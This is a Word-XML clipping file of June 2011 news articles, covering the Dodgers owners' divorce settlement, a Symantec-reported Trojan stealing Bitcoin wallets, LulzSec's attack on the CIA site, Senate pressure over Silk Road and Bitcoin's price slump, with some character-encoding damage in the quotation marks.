        <w:t>http://www.businessweek.com/news/2011-06-17/brooklyn-money-manager-gets-20-years-for-ponzi-scheme.html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Los Angeles Dodgers Owner, Ex-Wife Settle Divorce Dispute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2011, 1:56 PM EDT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Businessweek Lenny Dykstra Pleads Not Guilty to Grand Theft, Drug Charges Barry Bonds Seeks Acquittal or Retrial for Б─≤RamblingБ─(tm) Crime Barry Bonds Seeks Acquittal or Retrial for Б─≤RamblingБ─(tm) Crime Gay JudgeБ─(tm)s Decision on California Marriage Law Ruled Valid U.S. Defense of Marriage Law Unconstitutional, Judges Rule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Tools add to Business Exchange E-mail Print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Edvard Pettersson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with team ownership in third paragraph.)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17 (Bloomberg) - Los Angeles Dodgers owner Frank McCourt and his ex- wife, Jamie McCourt, agreed to settle a divorce dispute in an agreement that leaves the future of the team undecided until August.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Lawyers for the McCourts told Superior Court Judge Scott M. Gordon at a hearing in Los Angeles today that they reached an accord on how to resolve conflicting claims over who owns the ball club. The judge accepted the settlement.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agreement doesn't resolve the dispute over whether the Dodgers are Frank McCourt's sole property or community property. The judge scheduled a one-day trial for Aug. 4 to address Frank McCourt's remaining claim he has sole title to the team.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believe I will prevail on Aug. 4," Frank McCourt told reporters today outside the courthouse.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he loses, the Dodgers will be sold and the proceeds split evenly, according to the settlement. If he wins, Jamie McCourt will receive $100 million and all of the couple's residential properties except for one, according to the term sheet provided by the lawyers.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settlement clears the way for Major League Baseball to approve a proposed TV deal with Fox Sports, McCourt said. MLB wanted the judge to approve the transaction, Jamie McCourt to consent to it, and the divorce to be settled, all of which conditions were met with the agreement, McCourt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‘Huge Milestone'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huge milestone," he said. "It's a big step forward."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Fox agreement includes a $385 million loan. About $235 million of the money will go to the Dodgers, and about $80 million will go to pay off debt. About $50 million will "be put into an account subject to the court's orders," under the agreement.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Dennis Wasser, a lawyer for Jamie McCourt, told reporters it was "way too far ahead" to discuss in detail what would happen after the Aug. 4 trial, should his client prevail, beyond what was disclosed in the agreement.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Jamie McCourt last month asked the judge to order a sale of the Dodgers, saying baseball Commissioner Bud Selig's decision to take over the team showed that her ex-husband wasn't operating the franchise "in the best interests of the club or the marital estate."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League Baseball took over the business operations of the team in April because of what Selig called "my deep concerns regarding the finances and operations" of the Dodgers.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Trial Loss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McCourt last year lost a trial over the validity of a postnuptial agreement that he said made him the sole owner of the Dodgers.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Gordon ruled in December that the 2004 agreement McCourt and his ex-wife made when they bought the Dodgers and moved to California couldn't be enforced. Frank McCourt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McCourts, who divorced in October after 31 years of marriage, last month asked Gordon to mediate a settlement. The judge extended yesterday's deadline for the mediation.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McCourt bought the Dodgers from Fox Entertainment Group Inc. in 2004 for $421 million. The team is now worth about $800 million, making it the third most valuable baseball team after the New York Yankees and the Boston Red Sox, according to Forbes.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McCourt v. McCourt, BD514309, California Superior Court (Los Angeles County).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--Editors: Andrew Dunn, Charles Carter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 on this story: Edvard Pettersson in Los Angeles at epettersson@bloomberg.net.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Michael Hytha at mhytha@bloomberg.net.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Links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 a link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Businessweek.com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25 Cheapest Cities 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Hacking the Kinect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Economic Recovery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Play Golf With Your Boss...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CEO Guide to the Data Center Building Boom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Virgin Atlantic Mulls Alliances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 Stories Read E-mailed Discussed Why Apple Isn't in the Dow MBA Jobs: Post-Crisis, a Brave New World Bitcoins: Currency of the Geeks Want to Live Cheaply? Head to Texas God's MBAs: Why Mormon Missions Produce Leaders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Read Stories God's MBAs: Why Mormon Missions Produce Leaders MBA Jobs: Post-Crisis, a Brave New World Bitcoins: Currency of the Geeks The Big Business of Synthetic Highs Water Is the New Texas Liquid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E-mailed Stories Yelp's Online Reviewing Mafia Ron Paul's Fort Knox Fever Why Apple Isn't in the Dow Bitcoins: Currency of the Geeks Want to Live Cheaply? Head to Texas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RSS Feed: Most Discussed Stories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Job Jobs Business Development jobs Design jobs Entertainment jobs Environmental jobs Executive jobs Healthcare jobs Legal jobs Management jobs Marketing jobs Real Estate jobs Retail jobs Sales jobs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jobs SimplyHired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in Baseball Business Tribune Company Chrysler LLC Family- Owned Businesses Minority Owned Businesses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Reports The Micro Workforce Crisis in Japan Health Care Sentiment Analysis More Special Reports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Tools B-School Comparison B-School Calendar BW for Mobile E-mail Newsletters RSS White Papers A-Z Index BW Authors BX Topics Private Companies Public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&amp; Rankings Best Global Brands Best Places to Launch a Career Best Providers of Customer Service Best Undergraduate Business Schools Business School Rankings &amp; Profiles BW 50: Best Performing Companies Top 100 IT Companies Most Innovative Companies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Blogs Apple Asia Autos EconoChat Investing On Media Paul Kedrosky Small Business Technology Social Media @BW on Twitter BW on Facebook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Slideshow Gallery Autos Business Schools Design International Innovation Investing Managing Policy Real Estate Small Business Technology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Magazine Current Issue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>BusinessWeek 2011.06.17 21:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-17/los-angeles-dodgers-owner-ex-wife-settle-divorce-dispute.html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Digital pickpockets target Bitcoin virtual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- 1 hr 44 mins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(AFP) - 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authors move fast," Symantec's Stephen Doherty said in a blog post about digital pickpockets targeting Bitcoin, which was created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seen a recent Trojan in the wild targeting Bitcoin wallets" in computers running various versions of Windows, Doherty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one motive: to locate your Bitcoin wallet.dat file and email it to the attacker," Doherty said. "This is not surprising considering the potential values in a Bitcoin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digital currency that are accepted by a few online merchants. They can be traded at online currency exchanges such as Mtgox.com for real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Doherty said Bitcoin users should consider encrypting their wallet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Bitcoins, you have the option to encrypt your wallet and we recommend that you choose a strong password for this in the event that an attacker is attempting to brute-force your wallet open,"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a Bitcoin user going by the handle of "allinvain" claimed on a public Bitcoin forum that his computer had been hacked and 25,000 Bitcoins worth $500,000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drawn the attention of members of the US Senate recently following a report that they have been used to purchase prescription drugs, cocaine, LSD and heroin at an online network called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Joe Manchin, a Democrat from West Virginia, and Senator Charles Schumer, a Democrat from New York, wrote a letter to the US Attorney General and the Drug Enforcement Agency asking for the immediate shutdown of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purchasing Bitcoins through an exchange, a user can create an account on Silk Road and start purchasing illegal drugs from individuals around the world and have them delivered to their homes within days," they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Yahoo! News on Twitter, become a fan on Facebook</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>AFP on Yahoo! News 2011.06.17 20:36</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://news.yahoo.com/s/afp/20110617/ts_alt_afp/usitcrimecomputersecurityinternetbitcoin</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Digital pickpockets target Bitcoin virtual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17/06/2011 at 11:31 PM Online news: Computer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are targeting virtual currency Bitcoin, penetrating computers and swiping their digital wallets, according to computer security firm Symantec.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authors move fast," Symantec's Stephen Doherty said in a blog post about digital pickpockets targeting Bitcoin, which was created two years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seen a recent Trojan in the wild targeting Bitcoin wallets" in computers running various versions of Windows, Doherty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one motive: to locate your Bitcoin wallet.dat file and email it to the attacker," Doherty said. "This is not surprising considering the potential values in a Bitcoin wallet."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digital currency that are accepted by a few online merchants. They can be traded at online currency exchanges such as Mtgox.com for real dollars.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Doherty said Bitcoin users should consider encrypting their wallet files.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Bitcoins, you have the option to encrypt your wallet and we recommend that you choose a strong password for this in the event that an attacker is attempting to brute-force your wallet open,"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a Bitcoin user going by the handle of "allinvain" claimed on a public Bitcoin forum that his computer had been hacked and 25,000 Bitcoins worth $500,000 stolen.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drawn the attention of members of the US Senate recently following a report that they have been used to purchase prescription drugs, cocaine, LSD and heroin at an online network called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Joe Manchin, a Democrat from West Virginia, and Senator Charles Schumer, a Democrat from New York, wrote a letter to the US Attorney General and the Drug Enforcement Agency asking for the immediate shutdown of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purchasing Bitcoins through an exchange, a user can create an account on Silk Road and start purchasing illegal drugs from individuals around the world and have them delivered to their homes within days," they said.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Bangkok Post 2011.06.17 20:05</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.bangkokpost.com/tech/computer/242771/</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New Malware Steals Your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Kevin Poulsen Follow @kpoulsen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sure sign that the virtual currency Bitcoin has hit the mainstream, a new Trojan horse program discovered in the wild Thursday seeks out and steals victimsБ─(tm) Bitcoin wallets, the same way other malware goes for their banking passwords or credit card numbers.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Infostealer.Coinbit, is fairly simple: it targets Windows machines and zeroes in on the standard file location for a Bitcoin wallet. It then e-mails the wallet - a data file containing private crypto keys - to the attacker by way of a server in Poland, according to Symantec, which was first to alert on the attack.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Б─°If you use Bitcoins, you have the option to encrypt your wallet and we recommend that you choose a strong password for this in the event that an attacker is attempting to brute-force your wallet open,Б─² SymantecБ─(tm)s Stephen Doherty wrote in aб blog post Thursday.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anonymous, decentralized virtual currency thatБ─(tm)s been percolating for the last two years, and broke out into widespread attention with GawkerБ─(tm)s excellent June 1 story on Silk Road, the online drug market where Bitcoin is the standard currency. Independent of any national currency, Bitcoin is exchanged peer-to-peer, or earned by users who contribute CPU cycles to mathematically generating new Bitcoin, a process called Б─°mining.Б─²</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Hacker-types have been sniffing around Bitcoin since at least April, when a program called Stealthcoin debuted thatБ─(tm)s tailor-made for turning a botnet of compromised computers into a covert parallel Bitcoin mining machine. The first actual theft of Bitcoins was reported this week by a user who claimed a hacker transferred 25,000 BTC from his machine, theoretically worth about $500,000 at current exchange rates.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its single-minded focus, Infostealer.Coinbit has the feel of an interim solution. In the future, Bitcoin theft will probably be a standard feature in full-featured Trojans.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courtesy eagleapex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Kevin Poulsen is a senior editor at Wired.com, editor of the award-winning Threat Level blog, and author of Kingpin: How One Hacker Took Over the Billion-Dollar Cybercrime Underground (Crown, 2011).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Follow @kpoulsen on Twitter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Wired News 2011.06.17 05:34</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.wired.com/threatlevel/2011/06/bitcoin-malware/?currentPage=all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Man says he lost $500,000 in virtual currency heist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coins: As discreet as cash - and just as more vulnerable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 Goodin in San Francisco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Leaders of the open-source virtual currency project known as Bitcoin say they have no way to verify one user's claim that hundreds of thousands of dollars worth of digital coins were plucked from his computer earlier this week.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Rumors of the heist have been swirling since Monday, when a Bitcoin user named Allinvain claimed 25,000 Bitcoins, technically valued at close to $500,000, had mysteriously been transferred to an unknown user's account. Allinvain speculated the thieves made off with the windfall after using malware to compromise his Windows-based computer.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woke up to see a very large chunk of my bitcoin balance gone," the user wrote. "I feel like killing myself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300 posts later, it's still not clear if the claims are part of an elaborate hoax. Because Bitcoin is built on a peer-to-peer foundation that completely bypasses any sort of centralized database, it's impossible for even the architects of the digital currency to verify if a theft took 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technical details are complex cryptography and there's no way for us (as developers) to figure whether there was a real theft or not," Nils Schneider, one of the project backers, wrote in an email to The Register.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claims highlight the darker side of a completely decentralized digital currency that's built from the ground up to be as anonymous as cash. Long considered the Holy Grail of futurist libertarians because it can't be traced by marketers or governments, the system has no mechanism to trace the types of digital heists that are becoming a common occurrence these days.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can say many of the same things about cash, but there are a few caveats: It's typically not possible to store hundreds of thousands of dollars in a "wallet," digital or otherwise, and traditional wallets aren't protected by anything like the Windows operating system, which is notoriously susceptible to online criminals. Cash also can't be stolen remotely by someone who's physically located half-way around the world from the victim.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more, cash stored in bank accounts or paid using credit cards is often protected by guarantees from government agencies, such as the Federal Deposit Insurance Corporation, or card issuers, such as Visa. Those, of course, are the same boogeymen virtual cash-loving libertarians want to bypass in the first place.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few months, the exchange rate for Bitcoins has skyrocketed, reaching as high as $29 and hovering in the $18 to $19 range more recently. But Schneider said it's not realistic to value Allinvain's claimed loss at $500,000 because of another potential dark side in the virtual cash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just couldn't handle the sale of 25,000 BTC at once," he explained. The true value of the loss "would be more like $300,000 and cause the price to drop to around $10. Also, at the time he acquired the coins they probably were worth only $1000 or less. So the loss is in terms of USD is more a theoretical value. It's not like he put $300,000+ into bitcoins and lost them."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2011.06.16 03:35</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.theregister.co.uk/2011/06/16/bitcoin_theft_claims/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LulzSec Downs CIA's Public Site, Appears to be Subject of Framing Attempt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Group's attack continue to grow more flagrant, as do its detractors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around 6 p.m. Wednesday night after a busy day of distributed denial of service (DDoS) attacks some "31337" 2005-era "/b/tards" posted a microblog to Twitter. But these weren't just any "/b/tards"; these were the most infamous hackers of the year - LulzSec.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they didn't just post any old message. They typed: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Tango down - cia.gov - for the lulz.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Indeed the U.S. Central Intelligence Agency's homepage was unreachable.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Brazen Hacks, Phone DOS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apparent takedown of the CIA homepage is merely the latest in the griefers' audacious run of high profile system intrusions and DDOS attacks on gaming services, government entities, and more.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 outraged th3j35t3r ("The Jester" in leetspeak), a pro-American "hacktivist". He swore to LulzSec:</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 re: your last hit. Gloves off. Expect me. My silence is not an indication of weakness, as your mouth is an indication of yours.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>But if The Jester or anyone else can stop the group, they haven't yet. LulzSec appears to think itself untraceable, given its flagrant hacks - infiltrating the U.S. Senate servers, hacking an U.S. Federal Bureau of Investigations affiliate, and now hacking the public presence of the world's "most powerful" intelligence agency.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it's using new tactics. LulzSec has set up two phone lines -- 614- LULZSEC or 732-993-7703 - and is taking thousands of calls a day. Some it actually answers, asking guests questions for prizes or regaling them in a faux French accents. But it's also redirect the calls to phone denial of service (DOS) attacks - something rarely seen today.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it direct this phone wrath at the online MMORPG World of Warcraft's customer support, the FBI's Detroit headquarters, and "a certain hosting company" (many suspect it was GoDaddy). Last, but not least it direct attacks at disgraced security firm HBGary who was the subject of much lashing at the hands of Anonymous earlier this year.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Framing Attempt?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has been the subject of what appears to be wildly bizarre framing attempt involved the increasingly popular peer-to-peer digital currency Bitcoins. Former HBGary CEO, Aaron Barr, posted to Twitter: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manages to pilfer nearly a half million dollars in bitcoins while running their tele-DDOS-athon today. tinyurl.com/3mfngql Only the link in question didn't receive the funds today - it received them on Monday (6/13). And while it did send a donation to LulzSec's public donations account: 176LRX4WRWD5LWDMbhr94ptb2MW9varCZP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only sent the typical token gesture: 0.31337 ("elite" in leetspeak) - worth about $7 USD.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where did this bizarre rumor begin? It appears to trace back to a Pastebin: http://pastebin.com/88nGp508" rel="nofollow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Which was a repost of the Bethesda press release, with one important alteration - the account was altered to make it look like: 1KPTdMb6p7H3YCwsyFqrEmKGmsHqe1Q3jg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 a LulzSec donations account.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Clearly that account appears to be involved with some mass fraud or is a cleverly social engineering work to offer the deception of a mass fraud. Either way, the attempt to tie LulzSec to it seems clearly flawed and like a clear framing. No official LulzSec press release has ever carried that number.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unclear whether Mr. Barr is merely a uninformed observer, or is more deeply involved with this framing. But it's clear that his wild claims appear unfounded.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also possible that the postings are some sort of attempt to discredit Bitcoin itself. In recent weeks several news agencies have been spreading posts with dubious claims, attempting to discredit the digital crypto-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The Guardian's Ruth Whippman writes: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odd alliance of libertarians, geeks, businesspeople and drug kingpins hail Bitcoin as the future of the internet - global, private and immune from national economic crises and the whims of reckless bankers. Its critics in the political sphere fear that it could give rise to an online Wild West of gambling, prostitution and global bazaars for contraband.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dismissed as a nerdy curiosity, the untaxable Bitcoin may soon be due for a crackdown.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>And Information Week adds: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LulzSec Hackers Using Digital Currency: DEA Crackdown Soon?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The LulzSec hacker group has said it's receiving monetary support via a P2P digital currency, Bitcoins. Now Senators are urging DEA action on an illegal online drug sales site with a Bitcoins connection.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Seemingly, some people are suggesting that Bitcoin is more villainous than the far more anonymous form of currency - cash. The source of this misinformation/smear campaign is unknown, though, news agencies seem happy to spread it gleefully.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Insecure World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has been made to explain how LulzSec is doing what it does. But the fact of the matter is that the group isn't using new tactics, new tools, or new exploits. It's just getting more attention because it's good at advertising what it does and its affecting lots of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fact of the matter is that many corporate and government systems today are incredibly insecure and the vast majority of users are utterly incompetent when it comes to security [1][2][3] - even some system administrators [1].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 these factors and you get an infinitely abusable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abuses have occurred in years past. They may be happening at a faster rate this year. But the system has been insecure for years. And it will likely still be insecure next year, as well.</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2011.06.16 03:17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.dailytech.com/LulzSec+Downs+CIAs+Public+Site+Appears+to+be+Subject+of+Framing+Attempt/article21916.htm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Analysis: Why the Govt. wants to go after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Gomez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government and the Federal Reserve have complete and total control over the currency. They don't want to lose this control.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that makes Bitcoin an enemy of the establishment.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sum it up shortly, Bitcoin is a form of digital currency that was created in 2009 to act as an alternative to the central banking systems used all over the world. A large part of the world's population believes that central bankers have far too much control over the lives of people.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the power to print up money whenever they want, and they usually do this to help expand the size of the governments they work with. There is no limit to the authority a government has when their banker partners can inflate the currency supply to fund their grand schemes.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the world's first attempt to use technology to create a decentralized digital currency that cannot be tracked the way that traditional currency transactions are. In theory a decentralized currency like Bitcoin - that is free from the political control of the world's central banks - could strip governments of their control over people's lives.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Currencies that cannot be controlled fully by a government or central bank are a threat to the traditional systems of power that were established after the Federal Reserve Act in 1913. If you limit the amount of currency a government can create then you limit the power they possess. If there is a limited amount of money a government can spend, then they are forced to live within their means and make sensible financial choices.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driving philosophy behind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unfortunately they don't have much real world value. It is an admirable attempt to create a new system of crowd sourced currency, but you probably don't want to keep any of your money in Bitcoins. The market for Bitcoins is nothing like the market for real currencies. There are very few reasons to ever use Bitcoins as a medium of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hasn't stopped the Bitcoin from catching the attention of US government authorities though.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U.S. senators have written an open letter to the United States attorney general, asking federal authorities to crack down on "Silk Road," the Internet black market drug trade. The digital currency that funds it is the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haven't been able to shift the monetary paradigm just yet, but they have been used to create a new kind of black market. Their best use is for scoring LSD off of an encrypted computer network. That's enough for a few politicians to get involved.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Democratic Senators Charles Schumer of New York and Joe Manchin of West Virginia don't want people using the Internet to get drugs from a secretive website. They also don't like the idea that people can use a digital currency that hides who bought the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excerpt from their letter to US Attorney General Eric Holder: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method of payment for these illegal purchases is an untraceable peer-to-peer currency known as Bitcoins. After purchasing Bitcoins through an exchange, a user can create an account on Silk Road and start purchasing illegal drugs from individuals around the world and have them delivered to their homes within days. We urge you to take immediate action and shut down the Silk Road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Silk Road Internet drug market and Bitcoin are probably very alarming to the US government. People are using them to regain individual freedom in two of the areas that the government controls most: economic freedom and what people can put into their bodies.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senators are suggesting that the attorney general go after Silk Road and Bitcoin not because they are dangerous to the public, but because they don't want people to regain that control over their lives. The government has fooled people into thinking that they need harsh drug laws and The Fed's fiat currency for their own good. Bitcoin has given people a way to circumvent the system and now the politicos are coming out to put a stop to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know if they will be able to put a stop to Silk Road and Bitcoin because the way they are designed to work will make shutting them down very tricky. That won't stop the government from trying to snuff them out though. It should be very interesting to see how it plays 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They'll use the excuse that Bitcoin is bad because it's some kind of currency that is only used to get drugs on Silk Road. In reality politicians and big government don't like Bitcoin because it strips them and their central banker friends (who put them in office) of their enormous power over people's lives.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isn't viable yet, but it's clearly the beginning of a new era in economics and currency. Even if Bitcoin is somehow shut down, that won't stop people from attempting to create a digital currency that can't be controlled like central bank currencies are. People don't want to be controlled anymore by the global elite and this could be the beginning of a new system that will take hold in future decades. The idea of a digitally decentralized currency is one that is too good to go away. The government can try and get rid of Bitcoins if they want, but the idea of a decentralized currency is out there, and they can't kill ideas.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about: Opinion Features digital politics virtual currency</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>TG Daily 2011.06.15 17:28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.tgdaily.com/opinion-features/56636-analysis-why-the-govt-wants-to-go-after-bitcoins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 slump follows senatorsБ─≥ threats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Correlation or causation?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Richard Chirgwin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any investment adviser will tell you, itБ─(tm)s a bad idea to put all your eggs in one basket. And if Rick Falkvinge was telling the truth when he said all his savings were now in Bitcoin, heБ─(tm)s been taken down by a third in a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last weekБ─(tm)s call by US senators for an investigation into virtual crypto-currency Bitcoin, its value is slumping.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DailyTech, Bitcoins last Friday suffered more than 30 percent depreciation in value Б─" a considerable fall given that the currencyБ─(tm)s architecture is designed to inflate its value over time.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slump could reflect a change in attitude among holders of Bitcoins: if the currency were to become less attractive to pay for illegal drugs, then dealers and their customers would dump their Bitcoins in favour of some other medium.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Being dumped by PayPal wonБ─(tm)t have helped either. As DailyTech pointed out, PayPal has a policy against virtual currencies, so by enforcing the policy, PayPal has made it harder to trade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of regulation may also have sent shivers down Bitcoin- holdersБ─(tm) spines. The easiest regulatory action Б─" although requiring international cooperation Б─" would be to regulate, shut down or tax Bitcoin exchanges such as the now-famous Mt Gox. However, a sufficient slump may well have the same effect as a crackdown: whether Mt Gox is a single speculator or a group of traders, itБ─(tm)s unlikely to have the kind of backing (or even, perhaps, the hedging) that enables Б─°realБ─² currency traders to survive sharp swings in value.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collapse does, however, highlight a weak point in a model to which some pundits have assigned messianic status. Its algorithm is designed to manage Bitcoin supply, causing a diminishing issuance of new Bitcoins over time (or, to be more precise, making it harder over time to "mine" new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this only manages a self-contained system. If people want, at any time, to exchange Bitcoins for Б─°realБ─² dollars, then their value also depends on their relationship to those dollars Б─" making Bitcoins hostage to market sentiment.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sentiment seems to be collapsing at the moment. This may not mean the end for Bitcoin Б─" but if its exchanges start falling over, then it will be the end of a carefree, idealistic life for the virtual currency. бў</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2011.06.14 04:35</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.theregister.co.uk/2011/06/14/bitcoin_slump/</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Cracking the Bitcoin: Digging Into a $131M USD Virtual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slump shows signs of slowing; misinformation remains widespread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piece on the Bitcoin market's "Black Friday" saw tremendous pickup, being carried or quoted by Business Insider, Spiegel (Germany's equivalent of The Wall Street Journal), and Slashdot (whose submitter did an admirable job explaining the piece), among others.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weekend there was more movement in the Bitcoin market, and much confusion about the peer-to-peer currency remains. In this follow up we'll take an objective look at what we feel the true story of Bitcoin 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Is the Bitcoin "Recession"/"Depression" Over?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on Sunday showed signs of recovery. With the world's largest exchange, Mt. Gox opening at $14.75 USD/Bitcoin, the price has floated up to $20.14 USD/Bitcoin [source]. That's a massive 36.5 percent upward shift (in a deflationary direction). (The market has since receded slightly to $19 USD/Bitcoin.)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after the Bitcoin "Black Friday" the market is now down 30.3 percent thanks to another major dip on Saturday (this shift is in the inflationary direction).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but not least, if you look at Bitcoin trading over the last month it's seen rampant inflation, with prices soaring from around a dollar in mid-May to current levels - nearly 20 fold deflation.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does all this mean? In short, it indicates that there is a great deal of volatility in the Bitcoin market. Part of this arises out of media coverage of the crypto-currency. Part of it is based on the growing pains of an experimental currency that's still in the proving stages.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Are Bitcoins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Ostensibly, the answer is yes, Bitcoins are a peer-to-peer internet-driven cryptocurrency. However, Bitcoins' unique nature means that they have many critical differences from standard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originators of the Bitcoin market didn't want to take the 100+ years that most modern currencies required to mature. To that end they "seeded" the market, by granting ownership "miners" - people who used hardware to "find" Bitcoins using an underlying algorithm.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regard Bitcoins are a bit like land stakes. If you get in early and have the proper resources (hardware) you can lay stake to a large Bitcoin claim. For example, the "father" of Bitcoins, Satoshi Nakamoto reportedly has around 1.5 million Bitcoins (~$30M USD) [source] out of around 6.518m Bitcoins currently in existence.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rapid growth in value of Bitcoins comes thanks to their utility (more on that late). In that regard, they behave much like a stock. Much as a stock - say shares of Apple, Inc. (AAPL) - can rise dozens- fold on news and speculation, Bitcoins can see a great deal of volatility and offer great payoff to early adopters at the cost of great risk.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can be used to purchase real world goods and services among willing merchants. And they are housed in "accounts" - cryptography protected digital records. In that regard they are much like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currencies typically originated based on the barter of commodities (such as gold or animal pelts) then eventually evolved into a non-commodity based medium for making daily purchases. By contrast the creators of the Bitcoin movement hoped to remove the commodity stage. They instead created a currency that began as exchange object that could be traded with real world currencies, and evolved into a full fledged medium for selling and buying goods and services.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summarize the complex answer to this question, currencies inherently imply a stable medium for everyday financial exchanges. For now Bitcoins satisfy the latter definition of currency, but not the former. In that respect they can be thought of as a hybrid of a "stock" and a currency, which should (in theory) evolve towards a pure currency in the long run.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Are Bitcoins Risky to 